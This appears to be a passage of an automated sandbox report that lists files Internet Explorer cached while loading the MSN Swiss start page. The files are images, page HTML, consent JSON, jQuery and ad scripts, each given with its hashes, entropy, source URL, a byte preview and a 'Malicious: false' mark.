Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 310x166, frames 3
Category:	downloaded
Size (bytes):	8324
Entropy (8bit):	7.930458790592439
Encrypted:	false
SSDEEP:	192:BFXG5968waGfjF7xwT1GVkmaejmRlORkhXYKlHlECyud2V/V36He5E4+9wn79:v2M8o5CpGJaejmkkhXYKTzyUHe5ENGp
MD5:	8337F8F09943FAFEE445CB2CD44187FE
SHA1:	E1B45C0628067F740DA5271151030A06059962C7
SHA-256:	816A92E63FEDA04BD4F929C382D68280459320AE0ECB1770EC26D9AA55AB34E9
SHA-512:	B22292178E437911DDFBECFBCCFDB0FCE3DFD62468F1029B468AC860413F88D7286C892716F765427D89B51F09B5FFF85BF2BDD7A5022082992C48E035BEB6D0
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d74my.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...J..Z)(......(...(.....J{y6....A......(.@...[....8Pe.n..}+.Y...k.!]an.......y.6.#".k.[.Fx...Mcm4.b.~.l....A..\......E:.F..u)F.k'?....3i...d.....#......ey.o.<.?.1...6wS...O...Y...?............~+...[..o.H.[.\..$>...5w...4...S.+...E.sN.. f.}.A....qIV,.2.=...j....Z8b..So.K.+...I.c..Y..N.y..$...U..:..t.h6.*W......_.......[)3Kp.!I.z...Uo.K.c.r...T.CW...8.8.i....!B.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB1d74ru[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	11143
Entropy (8bit):	7.93409339059258
Encrypted:	false
SSDEEP:	192:xY8wL3e3CMZ+dv3O043h1BZbjb8Og3kpbPXAKVntKMoHEsDMNFlhoXx8P:OwSMw+04Tbjakp7wKj4HjUd
MD5:	C3B75DAF4291C35AFD77123D96F5CC8C
SHA1:	50D4C41D941FBFA56A0F78BF64256818B930BF11
SHA-256:	B15DC502A24696502FE9DA67A769938D9912D20F531E6D1610DE02CDA286BD94
SHA-512:	B30AB17304C74CC719D8E1B87E0F124587AB5E85E2615FE05E66355BBC612D600192C75C30C9A038D1BE5AF4ECAF3FAB832D5F0C25C3A5AD498A07304610B171
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d74ru.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..jJ..-IbR.P(.....\|..f..T..r..,hB..}I..Q.\|R....T.`d.6...H.4..Fq.X...2=..L....t........(bX.;sO.Gk.....=O..Y.E..C.....~..D...$##...>....Z...W.~....;..LGuV...j[)..B$......k..$..S.[l.....X'.Q.\|.q...,I!A..f.w.mjT...?...._..q....,Nf...z...Z.-.R.)r=.O.....e...b..v..v..........;=...r.@.j...Z......UF...R..E7.R...qZPD8..0......V.....h.....2...K.......M....J.Z.3.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BBJrII1[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	348
Entropy (8bit):	6.949202998657417
Encrypted:	false
SSDEEP:	6:6v/lhPkR/W/6TLXThgQPVi39WCOg6lu5fMNGlILQSZV8fMiuYIzbsFkup:6v/78/W/6T7Fg0q9WCn6MMNGSL1ukiua
MD5:	8E1FB6F831EDB003756420A8789619C3
SHA1:	AE3C4E18D5FD2772AE6BF59A6A52BDBB342FDE89
SHA-256:	558462D58A045ACE0C8F05314CF2932C4190ADC328D30BB6B5C4416C9197D858
SHA-512:	D0BB93C0D43F8A4225EC219C4F78028D2F643E1944AAC283FA39DAA1B29E86290D086157FD14DA11A81F404878F45D2BC2FC3AE268E62675345F701D7E6642C9
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBJrII1.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.1/.Q...y.T:I.V$..b0..`.w.#,6..?@...d....BH.P.P..H....?......<.b....W.w...X...Dm...p..k.B.OJ...^....-..HX...osK....{.A....=%........])-.\.h.k.0.......=I..O..M._....M_n.8...P.H......o\.?..}#?..2t8..k.g4.%..o1....T....qo.?....\|j...vd....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BBUE92F[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	708
Entropy (8bit):	7.5635226749074205
Encrypted:	false
SSDEEP:	12:6v/78/gMGkt+fwrs8vYfbooyBf1e7XKH5bp6z0w6TDy9xB0IIDtqf/bU9Fqj1yfd:XGVw9oiNH5pbPDy9xmju/AXEyfYFW
MD5:	770E05618413895818A5CE7582D88CBA
SHA1:	EF83CE65E53166056B644FFC13AF981B64C71617
SHA-256:	EEC4AB26140F5AEA299E1D5D5F0181DDC6B4AC2B2B54A7EE9E7BA6E0A4B4667D
SHA-512:	B01D7D84339D5E1B3958E82F7679AFD784CE1323938ECA7C313826A72F0E4EE92BD98691F30B735A6544543107B5F5944308764B45DB8DE06BE699CA51FF7653
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBUE92F.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs...%...%.IR$....YIDAT8OM..LA...~..."".q...X........+"q@...A...&H..H...D.6..p.X".......z.d.f......rg.?.....v7.....\.{eE..LB.rq.v.J.:tv...w.....g../.ou.]7........B..{..\|.S.......^....y......c.T.L...(.dA..9.}.....5w.N......>z.<..:.wq.-......T..w.8-.>P...Ke....!7L......I...?.mq.t....?..'.(....'j.......L<)L%........^..<..=M...rR.A4..gh...iX@co..I2....`9}...E.O.i?..j5.\|$.m..-5....Z.bl...E......'MX[.M.....s...e..7..u<L.k.@c......k..zzV....O..........e.,.5.+%.,,........!.....y;..d.mK..v.J.C..0G:w...O.N...........J....\|....b:L=...f:@6T[...F..t......x.....F.w..3....@.>.......!..bF.V..?u.b&q.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BBZbaoj[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	345
Entropy (8bit):	6.7032489389065
Encrypted:	false
SSDEEP:	6:6v/lhPkR/W/6TMm3lOPxUxYa5aoojWFWwoaSSHNVrMTL9opqn+vp:6v/78/W/6TMm30xNaEoo6TSWNVKoK0
MD5:	78BE86D65B6DC7DB0D71CD379A9BC492
SHA1:	1B01C9DB16886EA0E092FB9A35A5F630D2B02806
SHA-256:	62269816D79DAD6C6E726F4F326A68C12A8C885A6F7660822A2614F8030C0641
SHA-512:	EDB389EB371EDCE77FF18B1AAA4CEB605FE445AAFFBAF4BE16116F62EF143DA68A58B61B80F3CDAAE63B7168C0E7DA065E4EE9351C2CC7A1373461D0664ECD71
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8Oc\|.".........X]..o..,...A../..~....!... ..=.<T.&.....P.....?.......d;.0...id..._?1\|...A..}......"(.@.CW......_..Ae...0.f.....x.w:.........1.8........`..,!. P:../......DFn>.N..0f..q...`.e..9.% .-.a.kR.....U....~.....tnd`..:If....(....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BBaK3KR[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	551
Entropy (8bit):	7.412246442354541
Encrypted:	false
SSDEEP:	12:6v/78/kF5ij6uepiHibgdj9hUxSzDLpJL8cs3NKH3bnc7z:WO65iHibeBQSvL7S3N03g
MD5:	5928F2F40E8032C27F5D77E3152A8362
SHA1:	22744343D40A5AF7EA9A341E2E98D417B32ABBE9
SHA-256:	5AF55E02633880E0C2F49AFAD213D0004D335FF6CB78CAD33FCE4643AF79AD24
SHA-512:	364F9726189A88010317F82A7266A7BB70AA97C85E46D15D245D99C7C97DB69399DC0137F524AE5B754142CCCBD3ACB6070CAFD4EC778DC6E6743332BDA7C7B1
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBaK3KR.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J.....IDAT8O..9,.q..:&.E..#.,B".D.Zll..q,H.......DH..X5.@....P!.#......m?...~C....}......M\.....hb.G=..}.N..b.LYz.b.%.>..}...]..o$..2(.OF_..O./...pxt%...................S.mf..4..p~y...#:2.C......b.........a.M\S.!O.Xi.2.....DC... e7v.$.P[....l..Gc..OD...z..+u...2a%.e.....J.>..s.............]..O..RC....>....&.@.9N.r...p.$..=.d\|fG%&..f...kuy]7....~@eI.R....>.......DX.5.&..,V;.[..W.rQA.z.r.].......%N>\..X.e.n.^&.ij...{.W....T.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\a5ea21[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	758
Entropy (8bit):	7.432323547387593
Encrypted:	false
SSDEEP:	12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
MD5:	84CC977D0EB148166481B01D8418E375
SHA1:	00E2461BCD67D7BA511DB230415000AEFBD30D2D
SHA-256:	BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
SHA-512:	F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Preview:	.PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D..M..............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q\|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq\|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\cfdbd9[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	740
Entropy (8bit):	7.552939906140702
Encrypted:	false
SSDEEP:	12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
MD5:	FE5E6684967766FF6A8AC57500502910
SHA1:	3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
SHA-256:	3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
SHA-512:	AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
Preview:	.PNG........IHDR................U....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..\|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\de-ch[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	410186
Entropy (8bit):	5.438247175789049
Encrypted:	false
SSDEEP:	3072:pJSJUjxx+9staFqYNswq9l7sopFmp3UqdG+Nm+yYn45HQScV7rt6LX:pJS0O9lHERSmrYn42tu
MD5:	B57020791A104819C084C85EC809610C
SHA1:	1486D88A376A985C07774FE93FD7B81D3202C2C9
SHA-256:	EA1C88D1A432F8DFD684A6C03A3F9FFD093A10D04C5A642340ADC1408176DB77
SHA-512:	3F7719B6DF381BE140003F091EDBE2CE091E9EB5C27E2FA5A958AD8CFDD9E6658625F27F0A65C346A9F6868AE05EDE161B79372BA843A44A8702E50BA95A8BDA
Malicious:	false
Preview:	<!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20210116_30554380;a:c67f6319-e19a-4515-a428-59970c243f65;cn:8;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 8, sn: neurope-prod-hp, dt: 2021-01-06T23:25:22.1065409Z, bt: 2021-01-17T01:15:50.5620070Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-01-12 22:59:27Z;xdmap:2021-01-26 18:42:34Z;axd:;f:msnallexpusers,muidflt13cf,moneyedge3cf,platagyhp1cf,bingcollabhp2cf,onetrustpoplive,anaheim1cf,1s-bing-news,vebudumu04302020,bbh20200521msncf,strsl-spar-noc,weather5cf;userOptOut:false;userOptOutOptions:" data-js="{"dpi":1.0,"ddpi":1.0,"dpio":null,"forcedpi":null,"dms":6000,"ps":1000,"bds":7,"dg":"tmx.pc.ms.ie10plus","ssl":true

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\de-ch[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	78451
Entropy (8bit):	5.363992239728574
Encrypted:	false
SSDEEP:	768:hlAyi1IXQu+IE6VyKzxLx1wSICUSk4B1C04JLtJQLNEWE9+CPm7DIUYU5Jfoc:hlLQMFxaACNWit9+Ym7Mkz
MD5:	88AB3FC46E18B4306809589399DA1B04
SHA1:	009F623B8879A08A0BDD08A0266E138C500D52DB
SHA-256:	4D4DF96DDF04BBC6255DFF587A1543B26FC23E0B825DEC33576E61B041C3973A
SHA-512:	B01BB16FA1C04B2734B0B6AEE6B1FAFE914F95B21122D2480E09284B038BD966F831C4AA42C031FE5FC51718E1997F779FC6EBCD428DB943E050F362C10F4B29
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
Preview:	{"DomainData":{"cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAllText":"Einstellungen speichern","CookiesUsedText":"Verwendete Cookies","AboutLink":"https://go.microsoft.com/fwlink/?LinkId=5

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\iab2Data[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	180232
Entropy (8bit):	5.115010741936028
Encrypted:	false
SSDEEP:	768:l3JqIWlR2TryukPPnLLuAlGpWAowa8A5NbNQ8nYHv:l3JqIcATDELLxGpEw7Aq8YP
MD5:	EC3D53697497B516D3A5764E2C2D2355
SHA1:	0CDA0F66188EBF363F945341A4F3AA2E6CFE78D3
SHA-256:	2ABD991DABD5977796DB6AE4D44BD600768062D69EE192A4AF2ACB038E13D843
SHA-512:	CC35834574EF3062CCE45792F9755F1FB4B63DDD399A5B44C40555D191411F0B8924E5C2FEFCD08BAC69E1E6D6275E121CABB4A84005288A7452922F94BE5658
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
Preview:	{"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\jquery-2.1.1.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	84249
Entropy (8bit):	5.369991369254365
Encrypted:	false
SSDEEP:	1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
MD5:	9A094379D98C6458D480AD5A51C4AA27
SHA1:	3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
SHA-256:	B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
SHA-512:	4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquery-2.1.1.min.js
Preview:	/! jQuery v2.1.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\medianet[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	381580
Entropy (8bit):	5.484992669140589
Encrypted:	false
SSDEEP:	6144:4bu9Tw5qIZvbBH0m9Z3GCVvgz56Cu1basFyvrIW:HIZvdP3GCVvg4xVJFUrIW
MD5:	C8A5246D56B3E3EBC492932D0E6701A7
SHA1:	A23FF1FAA764FF411E21166F8AAB967DF410BDAF
SHA-256:	A81B815061A1AF1FBE03063FF5A1381D7298B7E4E0D919FB1C0A025A70C730C5
SHA-512:	45C843E569F26BE3A176FF9F1CF487ABA9AD61FAC168F509AB1EA3765C71365F82040672929027613A4B26279DD13F9D17519B96CCA475A2290413927424AFD2
Malicious:	false
IE Cache URL:	https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl\|\|"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON\|\|"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\medianet[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	381580
Entropy (8bit):	5.485004921043069
Encrypted:	false
SSDEEP:	6144:4bu9Tw5qIZvbBH0m9Z3GCVvgz56Cu1bcsFyvrIW:HIZvdP3GCVvg4xVPFUrIW
MD5:	2DD9FEFF2A6138AD078196AF757735D5
SHA1:	4B94F24A4CB68C4BD0B5EBDE70F6DD8AB8062614
SHA-256:	BA151F86A490C6AD0E7C681FC31822C326D1D9B7710B286D3A29D92F1956DE7E
SHA-512:	A9658BC661502B50D1C57E6970985B5F3DDDE2627392977ADA2D0284F3A2977909F06C1CC2B761C2AFB4DE5AEC47BCB02F8F60F76919EA1196F7EB82DD6CA219
Malicious:	false
IE Cache URL:	https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl\|\|"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON\|\|"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\otTCF-ie[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	102879
Entropy (8bit):	5.311489377663803
Encrypted:	false
SSDEEP:	768:ONkWT0m7r8N1qpPVsjvB6z4Yj3RCjnugKtLEdT8xJORONTMC5GkkJ0XcJGk58:8kunecpuj5QRCjnrKxJg0TMC5ZW8
MD5:	52F29FAC6C1D2B0BAC8FE5D0AA2F7A15
SHA1:	D66C777DA4B6D1FEE86180B2B45A3954AE7E0AED
SHA-256:	E497A9E7A9620236A9A67F77D2CDA1CC9615F508A392ECCA53F63D2C8283DC0E
SHA-512:	DF33C49B063AEFD719B47F9335A4A7CE38FA391B2ADF5ACFD0C3FE891A5D0ADDF1C3295E6FF44EE08E729F96E0D526FFD773DC272E57C3B247696B79EE1168BA
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
Preview:	!function(){"use strict";var c="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function e(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function t(e,t){return e(t={exports:{}},t.exports),t.exports}function n(e){return e&&e.Math==Math&&e}function p(e){try{return!!e()}catch(e){return!0}}function E(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}function o(e){return w.call(e).slice(8,-1)}function u(e){if(null==e)throw TypeError("Can't call method on "+e);return e}function l(e){return I(u(e))}function f(e){return"object"==typeof e?null!==e:"function"==typeof e}function i(e,t){if(!f(e))return e;var n,r;if(t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;if("function"==typeof(n=e.valueOf)&&!f(r=n.call(e)))return r;if(!t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;throw TypeError("Can't convert object to primitive value")}function y(e,t){retur

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\85-0f8009-68ddb2ab[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	391413
Entropy (8bit):	5.324500984847764
Encrypted:	false
SSDEEP:	6144:Rrfl3K/R9Sg/1xeUqkhmnid3WSqIjHSjaXiN4gxO0Dvq4FcG6Ix2K:d0/Rmznid3WSqIjHdMftHcGB3
MD5:	CA9F525C6154EF6AFF6C6FF9D0B07779
